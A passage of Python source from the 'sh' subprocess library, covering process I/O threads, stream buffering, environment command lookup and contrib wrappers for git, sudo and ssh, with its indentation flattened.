# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and (tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's file descriptor, we
# bypass reading from the stdout stream altogether, because we've
        # already hooked up this process's stdout fd to the other
        # process's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_parent_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_parent_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout
)
elif self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err and self._stderr_parent_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and (ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(
Logger("streamreader"),
self._stderr_parent_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr
)
elif self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"], self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(
background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads
)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(
input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term
)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and os.dup's the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(
output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event
)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primary for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_parent_fd and not self._stdin_stream:
os.close(self._stdin_parent_fd)
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit_thread, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit_thread.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive, quit_thread):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit_thread.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
exit_code = None
while alive:
quit_thread.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit_thread, stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit_thread.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception):
pass
class NotYetReadyToRead(Exception):
pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
elif input_obj is None:
log_msg = "None"
def raise_():
raise DoneReadingForever
get_chunk = raise_
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
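# an illustrative sketch (hypothetical commands) of the _in objects the
# dispatcher above knows how to read from:
#
#   sh.cat(_in="hello")              # string -> fixed-size chunk reader
#   sh.cat(_in=open("somefile"))     # file-like -> read() chunks
#   sh.cat(_in=iter(["a", "b"]))     # iterable -> next() chunks
#   sh.cat(_in=Queue())              # queue -> get() chunks, None ends input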
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the questions "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except: # noqa: E722
char = chr(4).encode()
                # normally, one EOF should be enough to signal to a program
# that is read()ing, to return 0 and be on your way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and not isinstance(chunk, bytes):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk), proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding, decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding, decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
def process(chunk): return False # noqa: E731
def finish(): return None # noqa: E731
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
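# an illustrative sketch (hypothetical commands) of the _out/_err handlers the
# dispatcher above can feed:
#
#   sh.ls(_out=my_callback)          # callable, fed decoded chunks
#   sh.ls(_out=io.StringIO())        # unicode buffer
#   sh.ls(_out=open("log", "wb"))    # anything with a .write method
#   sh.ls(_out=2)                    # a raw fd, wrapped via fdopen below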
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
if getattr(handler, "encoding", None):
def encode(chunk): return chunk.decode(handler.encoding) # noqa: E731
else:
def encode(chunk): return chunk # noqa: E731
if hasattr(handler, "flush"):
flush = handler.flush
else:
def flush(): return None # noqa: E731
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding, decode_errors, pipe_queue=None,
save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding, self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
    want that first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING, decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
        # buffered to unbuffered, it's very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
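# illustrative usage sketch:
#
#   with pushd("/tmp"):
#       ...   # os.getcwd() == "/tmp" in here
#   # the original working directory is restored on exit, even on exceptions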
@contextmanager
def _args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k, v) for k, v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set((
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"StreamBufferer",
"__project_url__",
"__version__",
"__file__",
"_args",
"pushd",
"glob",
"contrib",
))
def __init__(self, globs, baked_args=None):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
super(dict, self).__init__()
self.globs = globs
self.baked_args = baked_args or {}
def __getitem__(self, k):
if k == 'args':
# Let the deprecated '_args' context manager be imported as 'args'
k = '_args'
# if we're trying to import something real, see if it's in our global scope.
# what defines "real" is that it's in our whitelist
if k in self.whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
        # this check must come after testing if it's a command, because on
        # some systems, there are environment variables that can conflict with
        # command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
@staticmethod
def b_cd(path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
@staticmethod
def b_which(program, paths=None):
return which(program, paths)
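# an illustrative sketch of the lookup order implemented above:
#
#   env = Environment(globals())
#   env["Command"]   # whitelisted module attribute
#   env["cd"]        # custom builtin b_cd
#   env["ls"]        # resolved as a system program
#   env["HOME"]      # no such command, falls through to os.environ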
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(a, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return a, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
@contrib("ssh")
def ssh(orig): # pragma: no cover
""" An ssh command for automatic password login """
class SessionContent(object):
def __init__(self):
self.chars = deque(maxlen=50000)
self.lines = deque(maxlen=5000)
self.line_chars = []
self.last_line = ""
self.cur_char = ""
def append_char(self, char):
if char == "\n":
line = self.cur_line
self.last_line = line
self.lines.append(line)
self.line_chars = []
else:
self.line_chars.append(char)
self.chars.append(char)
self.cur_char = char
@property
def cur_line(self):
line = "".join(self.line_chars)
return line
class SSHInteract(object):
def __init__(self, prompt_match, pass_getter, out_handler, login_success):
self.prompt_match = prompt_match
self.pass_getter = pass_getter
self.out_handler = out_handler
self.login_success = login_success
self.content = SessionContent()
# some basic state
self.pw_entered = False
self.success = False
def __call__(self, char, stdin):
self.content.append_char(char)
if self.pw_entered and not self.success:
self.success = self.login_success(self.content)
if self.success:
return self.out_handler(self.content, stdin)
if self.prompt_match(self.content):
password = self.pass_getter()
stdin.put(password + "\n")
self.pw_entered = True
def process(a, kwargs):
real_out_handler = kwargs.pop("interact")
password = kwargs.pop("password", None)
login_success = kwargs.pop("login_success", None)
prompt_match = kwargs.pop("prompt", None)
prompt = "Please enter SSH password: "
if prompt_match is None:
def prompt_match(content): return content.cur_line.endswith("password: ") # noqa: E731
if password is None:
def pass_getter(): return getpass.getpass(prompt=prompt) # noqa: E731
else:
def pass_getter(): return password.rstrip("\n") # noqa: E731
if login_success is None:
def login_success(content): return True # noqa: E731
kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success)
return a, kwargs
cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process)
return cmd
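# an illustrative usage sketch (hypothetical host, password, and handler):
#
#   def interact(content, stdin):
#       # called with the session content once the password was accepted
#       if content.cur_line.endswith("$ "):
#           stdin.put("exit\n")
#
#   sh.contrib.ssh("user@example.com", password="hunter2", interact=interact)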
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except: # noqa: E722
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args=None):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
super(SelfWrapper, self).__init__(
name=getattr(self_module, '__name__', None),
doc=getattr(self_module, '__doc__', None)
)
for attr in ["__builtins__", "__file__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
